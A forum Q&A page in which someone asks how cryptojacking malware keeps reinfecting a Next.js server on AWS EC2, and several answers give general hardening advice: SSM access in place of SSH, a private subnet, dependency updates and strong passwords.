We're running a Next.js tool on an AWS EC2 Linux instance, but we keep getting hit by cryptojackers like coinminer:linux/xmrig.aaa. It causes CPU spikes, and our only reliable fix so far has been terminating the instance and starting over. We've tried egress filtering, firewall hardening, and anti-malware solutions, but they come back after a while. What are the common ways these attackers are getting in, and what's a proper long-term solution to prevent this instead of continuously rebuilding the server?
5 Answers
Consider using SSM instead of SSH entirely. This reduces the attack surface significantly and helps keep your instance secure.
It sounds like your EC2 instance might be in a public subnet with security groups open to the entire internet. Consider moving it to a private subnet and using systems manager for access instead. Also, update all your application packages regularly!
Check for vulnerabilities in your Next.js app or its dependencies. There have been a lot of supply chain attacks this year that could be affecting your server.
First off, make sure your SSH password isn't something like 'password'. It sounds basic, but you'd be surprised at how many people overlook this. If your security is too weak, cryptojackers can exploit that easily.
Next.js has seen some severe vulnerabilities lately, particularly with remote code execution. Keep your dependencies updated to avoid any security issues. You might want to bring in a security consultant to get a good handle on this.
Related Questions
Can't Load PhpMyadmin On After Server Update
Redirect www to non-www in Apache Conf
How To Check If Your SSL Cert Is SHA 1
Windows TrackPad Gestures